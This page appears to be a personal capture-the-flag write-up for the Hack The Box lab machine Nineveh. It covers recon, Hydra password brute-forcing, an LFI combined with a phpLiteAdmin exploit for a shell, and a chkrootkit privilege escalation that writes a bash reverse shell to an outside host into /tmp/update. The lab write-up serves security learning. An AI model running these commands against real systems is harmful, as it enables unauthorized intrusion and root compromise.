
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
      
      <link rel="shortcut icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.1.2, mkdocs-material-6.2.8">
    
    
      
        <title>Nineveh - Notes</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.cb6bc1d0.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.39b8e14a.min.css">
        
          
          
          <meta name="theme-color" content="#ff6e42">
        
      
    
    
    
      
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,400i,700%7CRoboto+Mono&display=fallback">
        <style>body,input{font-family:"Roboto",-apple-system,BlinkMacSystemFont,Helvetica,Arial,sans-serif}code,kbd,pre{font-family:"Roboto Mono",SFMono-Regular,Consolas,Menlo,monospace}</style>
      
    
    
    
    
      
    
    
  </head>
  
  
    
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="deep-orange" data-md-color-accent="green">
      
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#nineveh" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header-nav md-grid" aria-label="Header">
    <a href="../.." title="Notes" class="md-header-nav__button md-logo" aria-label="Notes">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 003-3 3 3 0 00-3-3 3 3 0 00-3 3 3 3 0 003 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54z"/></svg>

    </a>
    <label class="md-header-nav__button md-icon" for="__drawer">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2z"/></svg>
    </label>
    <div class="md-header-nav__title" data-md-component="header-title">
      <div class="md-header-nav__ellipsis">
        <div class="md-header-nav__topic">
          <span class="md-ellipsis">
            Notes
          </span>
        </div>
        <div class="md-header-nav__topic">
          <span class="md-ellipsis">
            
              Nineveh
            
          </span>
        </div>
      </div>
    </div>
    
      <label class="md-header-nav__button md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0116 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 019.5 16 6.5 6.5 0 013 9.5 6.5 6.5 0 019.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
      </label>
      
<div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" data-md-state="active" required>
      <label class="md-search__icon md-icon" for="__search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0116 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 019.5 16 6.5 6.5 0 013 9.5 6.5 6.5 0 019.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5z"/></svg>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
      </label>
      <button type="reset" class="md-search__icon md-icon" aria-label="Clear" data-md-component="search-reset" tabindex="-1">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41z"/></svg>
      </button>
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    




  

<nav class="md-nav md-nav--primary md-nav--integrated" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="Notes" class="md-nav__button md-logo" aria-label="Notes">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 003-3 3 3 0 00-3-3 3 3 0 00-3 3 3 3 0 003 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54z"/></svg>

    </a>
    Notes
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
      

  
  
  
    <li class="md-nav__item">
      <a href="../.." class="md-nav__link">
        Home
      </a>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="nav-2" data-md-state="indeterminate" type="checkbox" id="nav-2" checked>
      
      <label class="md-nav__link" for="nav-2">
        Shells
        <span class="md-nav__icon md-icon"></span>
      </label>
      <nav class="md-nav" aria-label="Shells" data-md-level="1">
        <label class="md-nav__title" for="nav-2">
          <span class="md-nav__icon md-icon"></span>
          Shells
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
          
            
  
  
  
    <li class="md-nav__item">
      <a href="../../shells/reverse/" class="md-nav__link">
        Reverse Shells
      </a>
    </li>
  

          
            
  
  
  
    <li class="md-nav__item">
      <a href="../../shells/remote/" class="md-nav__link">
        Remote Access
      </a>
    </li>
  

          
            
  
  
  
    <li class="md-nav__item">
      <a href="../../shells/webshells/" class="md-nav__link">
        Web Shells
      </a>
    </li>
  

          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
  
    
    <li class="md-nav__item md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="nav-3" data-md-state="indeterminate" type="checkbox" id="nav-3" checked>
      
      <label class="md-nav__link" for="nav-3">
        WebApps
        <span class="md-nav__icon md-icon"></span>
      </label>
      <nav class="md-nav" aria-label="WebApps" data-md-level="1">
        <label class="md-nav__title" for="nav-3">
          <span class="md-nav__icon md-icon"></span>
          WebApps
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
          
            
  
  
  
    <li class="md-nav__item">
      <a href="../../webapps/php/" class="md-nav__link">
        PHP
      </a>
    </li>
  

          
        </ul>
      </nav>
    </li>
  

    
      
      
      

  
  
    
  
  
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
      
        <input class="md-nav__toggle md-toggle" data-md-toggle="nav-4" type="checkbox" id="nav-4" checked>
      
      <label class="md-nav__link" for="nav-4">
        HTB
        <span class="md-nav__icon md-icon"></span>
      </label>
      <nav class="md-nav" aria-label="HTB" data-md-level="1">
        <label class="md-nav__title" for="nav-4">
          <span class="md-nav__icon md-icon"></span>
          HTB
        </label>
        <ul class="md-nav__list" data-md-scrollfix>
          
          
            
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" data-md-toggle="toc" type="checkbox" id="__toc">
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          Nineveh
          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        Nineveh
      </a>
      
        
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#recon" class="md-nav__link">
    Recon
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#http" class="md-nav__link">
    HTTP
  </a>
  
    <nav class="md-nav" aria-label="HTTP">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#port-80" class="md-nav__link">
    Port 80
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#port-443" class="md-nav__link">
    Port 443
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#shell-as-www-data" class="md-nav__link">
    Shell as www-data
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#privesc" class="md-nav__link">
    Privesc
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

          
            
  
  
  
    <li class="md-nav__item">
      <a href="../sense/" class="md-nav__link">
        Sense
      </a>
    </li>
  

          
            
  
  
  
    <li class="md-nav__item">
      <a href="../solidstate/" class="md-nav__link">
        Solidstate
      </a>
    </li>
  

          
        </ul>
      </nav>
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
          
          <div class="md-content">
            <article class="md-content__inner md-typeset">
              
                
                
                <h1 id="nineveh">Nineveh</h1>
<ul>
<li>Linux</li>
<li>Medium</li>
</ul>
<h2 id="recon">Recon</h2>
<ul>
<li>Nmap
<div class="highlight"><pre><span></span><code>─❯ sudo nmap -p- -T5 -Pn -sV -sC <span class="nv">$target</span> -v 
Nmap scan report <span class="k">for</span> <span class="m">10</span>.129.99.169
Host is up <span class="o">(</span><span class="m">0</span>.045s latency<span class="o">)</span>.
Not shown: <span class="m">65533</span> filtered ports
PORT    STATE SERVICE  VERSION
<span class="m">80</span>/tcp  open  http     Apache httpd <span class="m">2</span>.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span>
<span class="p">|</span> http-methods: 
<span class="p">|</span>_  Supported Methods: GET HEAD POST OPTIONS
<span class="p">|</span>_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span>
<span class="p">|</span>_http-title: Site doesn<span class="s1">&#39;t have a title (text/html).</span>
<span class="s1">443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))</span>
<span class="s1">| http-methods: </span>
<span class="s1">|_  Supported Methods: GET HEAD POST OPTIONS</span>
<span class="s1">|_http-server-header: Apache/2.4.18 (Ubuntu)</span>
<span class="s1">|_http-title: Site doesn&#39;</span>t have a title <span class="o">(</span>text/html<span class="o">)</span>.
<span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>nineveh.htb/organizationName<span class="o">=</span>HackTheBox Ltd/stateOrProvinceName<span class="o">=</span>Athens/countryName<span class="o">=</span>GR
<span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>nineveh.htb/organizationName<span class="o">=</span>HackTheBox Ltd/stateOrProvinceName<span class="o">=</span>Athens/countryName<span class="o">=</span>GR
<span class="p">|</span> Public Key type: rsa
<span class="p">|</span> Public Key bits: <span class="m">2048</span>
<span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption
<span class="p">|</span> Not valid before: <span class="m">2017</span>-07-01T15:03:30
<span class="p">|</span> Not valid after:  <span class="m">2018</span>-07-01T15:03:30
<span class="p">|</span> MD5:   d182 94b8 <span class="m">0210</span> <span class="m">7992</span> bf01 e802 b26f <span class="m">8639</span>
<span class="p">|</span>_SHA-1: <span class="m">2275</span> b03e 27bd <span class="m">1226</span> fdaa 8b0f 6de9 84f0 113b 42c0
<span class="p">|</span>_ssl-date: TLS randomness does not represent <span class="nb">time</span>
<span class="p">|</span> tls-alpn: 
<span class="p">|</span>_  http/1.1
</code></pre></div></li>
</ul>
<h2 id="http">HTTP</h2>
<ul>
<li>We find in the nmap output that ssl cert belongs to <code>commonName=nineveh.htb</code> so we add it to our <code>/etc/hosts</code></li>
</ul>
<h3 id="port-80">Port 80</h3>
<ul>
<li>
<p>Fuzzing the site we find a <code>department</code> directory with a <code>login.php</code> page:</p>
<p><img alt="" src="../images/nine_login.png" /></p>
<ul>
<li>In the src of the webpage we find the following comment, we can try to bruteforce creds after:</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="c">&lt;!-- @admin! MySQL is been installed.. please fix the login page! ~amrois --&gt;</span>
</code></pre></div>
</li>
</ul>
<h3 id="port-443">Port 443</h3>
<ul>
<li>
<p>Fuzzing the website on 443 find some directories
    <div class="highlight"><pre><span></span><code>ffuf -v -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://nineveh.htb/FUZZ -v -c -t <span class="m">100</span>
...
<span class="o">[</span>Status: <span class="m">301</span>, Size: <span class="m">309</span>, Words: <span class="m">20</span>, Lines: <span class="m">10</span><span class="o">]</span>
<span class="p">|</span> URL <span class="p">|</span> https://nineveh.htb/db
<span class="p">|</span> --&gt; <span class="p">|</span> https://nineveh.htb/db/
    * FUZZ: db

<span class="o">[</span>Status: <span class="m">200</span>, Size: <span class="m">49</span>, Words: <span class="m">3</span>, Lines: <span class="m">2</span><span class="o">]</span>
<span class="p">|</span> URL <span class="p">|</span> https://nineveh.htb/
    * FUZZ: 

<span class="o">[</span>Status: <span class="m">403</span>, Size: <span class="m">300</span>, Words: <span class="m">22</span>, Lines: <span class="m">12</span><span class="o">]</span>
<span class="p">|</span> URL <span class="p">|</span> https://nineveh.htb/server-status
    * FUZZ: server-status

<span class="o">[</span>Status: <span class="m">301</span>, Size: <span class="m">319</span>, Words: <span class="m">20</span>, Lines: <span class="m">10</span><span class="o">]</span>
<span class="p">|</span> URL <span class="p">|</span> https://nineveh.htb/secure_notes
<span class="p">|</span> --&gt; <span class="p">|</span> https://nineveh.htb/secure_notes/
* FUZZ: secure_notes
...
</code></pre></div></p>
</li>
<li>
<p>On the /db/ directory we find the following</p>
<ul>
<li>phpLiteAdmin</li>
<li>Version 1.9
<img alt="" src="../images/nineveh1.png" /></li>
</ul>
</li>
<li>
<p>In /secure_notes/ we find an image.</p>
<ul>
<li>
<p>Download the image and check its metadata:
<div class="highlight"><pre><span></span><code>╰─❯ exiftool nineveh.png 
ExifTool Version Number         : <span class="m">12</span>.16
File Name                       : nineveh.png
Directory                       : .
File Size                       : <span class="m">2</span>.8 MiB
File Modification Date/Time     : <span class="m">2017</span>:07:03 <span class="m">01</span>:50:02+02:00
File Access Date/Time           : <span class="m">2021</span>:02:18 <span class="m">17</span>:47:55+01:00
File Inode Change Date/Time     : <span class="m">2021</span>:02:18 <span class="m">17</span>:47:50+01:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : <span class="m">1497</span>
Image Height                    : <span class="m">746</span>
Bit Depth                       : <span class="m">8</span>
Color Type                      : RGB
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Significant Bits                : <span class="m">8</span> <span class="m">8</span> <span class="m">8</span>
Software                        : Shutter
Warning                         : <span class="o">[</span>minor<span class="o">]</span> Trailer data after PNG IEND chunk
Image Size                      : 1497x746
Megapixels                      : <span class="m">1</span>.1
</code></pre></div></p>
</li>
<li>
<p>We see a Warning which told us that there is a trailer data. We extract it with <code>binwalk</code>
<div class="highlight"><pre><span></span><code>╰─❯ binwalk nineveh.png  
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
<span class="m">0</span>             0x0             PNG image, <span class="m">1497</span> x <span class="m">746</span>, <span class="m">8</span>-bit/color RGB, non-interlaced
<span class="m">84</span>            0x54            Zlib compressed data, best compression
<span class="m">2881744</span>       0x2BF8D0        POSIX tar archive <span class="o">(</span>GNU<span class="o">)</span>
</code></pre></div></p>
</li>
<li>
<p>Examining the files
<img alt="" src="../images/nineveh2.png" /></p>
<p>That is a private ssh key, but port 22 in the machine is not open so we keep it for now.</p>
</li>
</ul>
</li>
</ul>
<h2 id="shell-as-www-data">Shell as www-data</h2>
<ul>
<li>We try to brute the admin creds with Hydra on the port 80 login.php file</li>
</ul>
<div class="highlight"><pre><span></span><code>╰─❯ hydra nineveh.htb -l admin -P /usr/share/seclists/Passwords/probable-v2-top12000.txt http-post-form <span class="s2">&quot;/department/login.php:username=^USER^&amp;password=^PASS^:Invalid password&quot;</span> 
...<span class="o">[</span>snip<span class="o">]</span>...
<span class="o">[</span>DATA<span class="o">]</span> attacking http-post-form://nineveh.htb:80/department/login.php:username<span class="o">=</span>^USER^<span class="p">&amp;</span><span class="nv">password</span><span class="o">=</span>^PASS^:Invalid password
<span class="o">[</span><span class="m">80</span><span class="o">][</span>http-post-form<span class="o">]</span> host: nineveh.htb   login: admin   password: 1q2w3e4r5t
<span class="m">1</span> of <span class="m">1</span> target successfully completed, <span class="m">1</span> valid password found
Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> finished at <span class="m">2021</span>-02-18 <span class="m">20</span>:06:42
</code></pre></div>
<ul>
<li>
<p>Then we log and get redirected to <code>http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt</code></p>
<ul>
<li>
<p>After tampering a bit, we find there is a LFI in <code>notes</code> parameter:
    <img alt="" src="../images/nive_lfi.png" /></p>
</li>
<li>
<p>But we need to upload a PHP file for example, to get a shell with the LFI as there is no SSH port.</p>
</li>
</ul>
</li>
<li>
<p>Coming back into the phpLiteAdmin application, we also bruteforce creds with Hydra finding the password is <code>password123</code></p>
<div class="highlight"><pre><span></span><code>╰─❯ hydra nineveh.htb -l user -P /usr/share/seclists/Passwords/probable-v2-top12000.txt https-post-form <span class="s2">&quot;/db/index.php:password=^PASS^&amp;proc_login=true:Incorrect password&quot;</span> 
...
<span class="o">[</span>DATA<span class="o">]</span> attacking http-post-forms://nineveh.htb:443/db/index.php:password<span class="o">=</span>^PASS^<span class="p">&amp;</span><span class="nv">proc_login</span><span class="o">=</span>true:Incorrect password
<span class="o">[</span><span class="m">443</span><span class="o">][</span>http-post-form<span class="o">]</span> host: nineveh.htb   login: user   password: password123
<span class="m">1</span> of <span class="m">1</span> target successfully completed, <span class="m">1</span> valid password found
Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> finished at <span class="m">2021</span>-02-18 <span class="m">18</span>:37:37
</code></pre></div>
<ul>
<li>
<p>Now that we have access to phpLiteAdmin, and we confirmed before the version is 1.9, we can find a reliable <a href="https://www.exploit-db.com/exploits/24044">exploit</a> for this. To exploit it we do the following:</p>
<ol>
<li>Create a new database called test.php</li>
<li>Create a table into the database called SHELL</li>
<li>Insert PHP code into this table</li>
</ol>
<p><img alt="" src="../images/nine_phplite.png" /></p>
</li>
<li>
<p>After doing that, we just need to use the LFI found before to call our php file that will execute commands. So we will URL encode a reverse shell in the request.</p>
<p><img alt="" src="../images/nine_lfitoshell.png" /></p>
</li>
</ul>
</li>
</ul>
<h2 id="privesc">Privesc</h2>
<ul>
<li>
<p>After transfering the typical enumeration scripts and so, we use Pspy to inspect processes executing in the machine. And we find Root user is using <code>chkrootkit</code>:
    <img alt="" src="../images/nine_chkrootkit.png" /></p>
<ul>
<li>
<p>We find an <a href="https://www.exploit-db.com/exploits/33899">exploit</a> for this program abusing a non quoted execution.</p>
</li>
<li>
<p>Just need to create a file in <code>/tmp/</code> called <code>update</code> that will be executed.
<div class="highlight"><pre><span></span><code><span class="nb">echo</span> <span class="s2">&quot;/bin/bash -c &#39;bash -i &gt;&amp; /dev/tcp/10.10.14.58/5555 0&gt;&amp;1&#39; &amp;&quot;</span> &gt; /tmp/update
</code></pre></div></p>
</li>
<li>
<p>Wait for the user root to execute <code>chkrootkit</code> and we are done.
    <img alt="" src="../images/nine_root.png" /></p>
</li>
</ul>
</li>
</ul>
                
              
              
                


              
            </article>
          </div>
        </div>
      </main>
      
        
<footer class="md-footer">
  
    <div class="md-footer-nav">
      <nav class="md-footer-nav__inner md-grid" aria-label="Footer">
        
          <a href="../../webapps/php/" class="md-footer-nav__link md-footer-nav__link--prev" rel="prev">
            <div class="md-footer-nav__button md-icon">
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
            </div>
            <div class="md-footer-nav__title">
              <div class="md-ellipsis">
                <span class="md-footer-nav__direction">
                  Previous
                </span>
                PHP
              </div>
            </div>
          </a>
        
        
          <a href="../sense/" class="md-footer-nav__link md-footer-nav__link--next" rel="next">
            <div class="md-footer-nav__title">
              <div class="md-ellipsis">
                <span class="md-footer-nav__direction">
                  Next
                </span>
                Sense
              </div>
            </div>
            <div class="md-footer-nav__button md-icon">
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11H4z"/></svg>
            </div>
          </a>
        
      </nav>
    </div>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-footer-copyright">
        
        Made with
        <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
          Material for MkDocs
        </a>
      </div>
      
    </div>
  </div>
</footer>
      
    </div>
    
      <script src="../../assets/javascripts/vendor.18f0862e.min.js"></script>
      <script src="../../assets/javascripts/bundle.994580cf.min.js"></script><script id="__lang" type="application/json">{"clipboard.copy": "Copy to clipboard", "clipboard.copied": "Copied to clipboard", "search.config.lang": "en", "search.config.pipeline": "trimmer, stopWordFilter", "search.config.separator": "[\\s\\-]+", "search.placeholder": "Search", "search.result.placeholder": "Type to start searching", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.term.missing": "Missing"}</script>
      
      <script>
        app = initialize({
          base: "../..",
          features: ['navigation.expand', 'toc.integrate'],
          search: Object.assign({
            worker: "../../assets/javascripts/worker/search.9c0e82ba.min.js"
          }, typeof search !== "undefined" && search)
        })
      </script>
      
    
  </body>
</html>